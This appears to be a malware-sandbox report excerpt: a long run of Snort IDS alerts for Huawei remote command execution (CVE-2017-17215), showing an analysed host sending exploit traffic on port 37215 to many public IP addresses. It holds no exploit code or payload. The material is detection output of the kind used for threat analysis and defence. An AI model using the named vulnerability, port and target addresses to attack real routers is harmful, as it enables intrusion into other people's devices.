                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50036 -> 88.195.110.211:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44596 -> 41.119.22.219:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44596 -> 41.119.22.219:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34032 -> 197.67.179.143:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34032 -> 197.67.179.143:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34654 -> 197.241.127.58:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34654 -> 197.241.127.58:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41550 -> 41.166.159.225:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41550 -> 41.166.159.225:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41970 -> 197.113.51.118:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41970 -> 197.113.51.118:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36304 -> 41.41.122.187:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36304 -> 41.41.122.187:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34626 -> 41.160.207.169:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34626 -> 41.160.207.169:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60908 -> 41.96.218.16:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60908 -> 41.96.218.16:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35748 -> 197.112.222.157:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35748 -> 197.112.222.157:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42824 -> 139.165.159.227:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42824 -> 139.165.159.227:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33894 -> 41.132.20.65:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33894 -> 41.132.20.65:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52234 -> 157.17.98.184:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52234 -> 157.17.98.184:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34754 -> 41.24.39.230:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34754 -> 41.24.39.230:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57408 -> 197.6.34.101:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57408 -> 197.6.34.101:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47064 -> 41.123.9.56:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47064 -> 41.123.9.56:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43956 -> 197.16.71.7:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43956 -> 197.16.71.7:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55620 -> 157.113.182.239:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55620 -> 157.113.182.239:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56072 -> 169.239.10.111:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56072 -> 169.239.10.111:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50398 -> 157.174.150.26:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50398 -> 157.174.150.26:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53044 -> 157.8.46.59:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53044 -> 157.8.46.59:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44056 -> 158.165.91.44:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44056 -> 158.165.91.44:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43088 -> 198.69.140.160:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43088 -> 198.69.140.160:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56934 -> 157.223.197.130:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56934 -> 157.223.197.130:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50040 -> 41.124.29.47:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50040 -> 41.124.29.47:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50524 -> 197.26.114.175:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50524 -> 197.26.114.175:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34208 -> 157.121.143.8:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34208 -> 157.121.143.8:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57576 -> 197.244.173.225:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57576 -> 197.244.173.225:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58804 -> 157.251.206.76:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58804 -> 157.251.206.76:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60616 -> 43.169.90.245:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60616 -> 43.169.90.245:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59138 -> 150.124.88.37:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59138 -> 150.124.88.37:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37398 -> 77.13.19.125:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37398 -> 77.13.19.125:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53310 -> 103.34.160.230:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53310 -> 103.34.160.230:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40010 -> 170.47.187.157:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40010 -> 170.47.187.157:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33424 -> 157.77.208.129:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33424 -> 157.77.208.129:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45996 -> 157.115.232.41:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45996 -> 157.115.232.41:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48984 -> 41.231.235.189:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48984 -> 41.231.235.189:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59916 -> 157.129.228.162:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59916 -> 157.129.228.162:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39268 -> 41.224.244.226:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39268 -> 41.224.244.226:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46650 -> 110.243.142.209:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46650 -> 110.243.142.209:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43482 -> 198.254.9.254:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43482 -> 198.254.9.254:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56980 -> 41.75.227.101:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56980 -> 41.75.227.101:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36396 -> 81.147.177.5:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36396 -> 81.147.177.5:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37906 -> 41.53.184.177:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37906 -> 41.53.184.177:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49544 -> 41.37.144.8:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49544 -> 41.37.144.8:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39668 -> 157.53.103.29:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39668 -> 157.53.103.29:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44694 -> 41.47.64.65:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44694 -> 41.47.64.65:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42692 -> 197.241.179.191:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42692 -> 197.241.179.191:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54948 -> 157.23.56.129:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54948 -> 157.23.56.129:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46618 -> 118.76.56.217:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46618 -> 118.76.56.217:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59652 -> 41.240.87.211:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59652 -> 41.240.87.211:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37938 -> 157.210.25.215:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37938 -> 157.210.25.215:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53706 -> 157.34.104.183:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53706 -> 157.34.104.183:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49836 -> 197.55.44.167:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49836 -> 197.55.44.167:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55528 -> 210.132.156.163:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55528 -> 210.132.156.163:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47260 -> 8.108.207.220:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47260 -> 8.108.207.220:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39976 -> 41.33.245.21:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39976 -> 41.33.245.21:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48742 -> 197.251.31.217:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48742 -> 197.251.31.217:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40842 -> 41.241.135.76:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40842 -> 41.241.135.76:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41502 -> 157.109.181.179:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41502 -> 157.109.181.179:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37624 -> 41.245.116.58:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37624 -> 41.245.116.58:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44780 -> 219.159.165.91:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44780 -> 219.159.165.91:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33444 -> 197.168.86.78:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33444 -> 197.168.86.78:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52812 -> 41.248.83.42:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52812 -> 41.248.83.42:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38176 -> 41.20.53.198:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38176 -> 41.20.53.198:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46326 -> 157.222.120.169:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46326 -> 157.222.120.169:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44552 -> 41.216.133.169:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44552 -> 41.216.133.169:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40646 -> 198.189.132.142:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40646 -> 198.189.132.142:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60464 -> 41.189.194.244:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60464 -> 41.189.194.244:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36392 -> 157.153.207.206:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36392 -> 157.153.207.206:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58330 -> 41.128.110.44:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58330 -> 41.128.110.44:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51490 -> 41.75.68.114:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51490 -> 41.75.68.114:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39114 -> 197.196.77.201:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39114 -> 197.196.77.201:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37926 -> 157.32.103.4:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37926 -> 157.32.103.4:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59428 -> 197.118.130.41:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59428 -> 197.118.130.41:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55384 -> 157.243.7.84:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55384 -> 157.243.7.84:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41340 -> 197.95.169.228:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41340 -> 197.95.169.228:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59562 -> 197.67.79.4:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59562 -> 197.67.79.4:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37138 -> 197.229.227.49:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37138 -> 197.229.227.49:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53564 -> 157.72.248.222:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53564 -> 157.72.248.222:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42434 -> 155.28.185.96:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42434 -> 155.28.185.96:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35680 -> 197.132.243.55:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35680 -> 197.132.243.55:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34184 -> 41.78.37.100:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34184 -> 41.78.37.100:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49618 -> 197.74.184.130:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49618 -> 197.74.184.130:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34962 -> 197.194.243.184:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34962 -> 197.194.243.184:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59806 -> 197.99.9.223:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59806 -> 197.99.9.223:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37642 -> 157.54.130.2:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37642 -> 157.54.130.2:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57288 -> 41.191.248.36:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57288 -> 41.191.248.36:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34066 -> 91.110.161.158:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34066 -> 91.110.161.158:37215
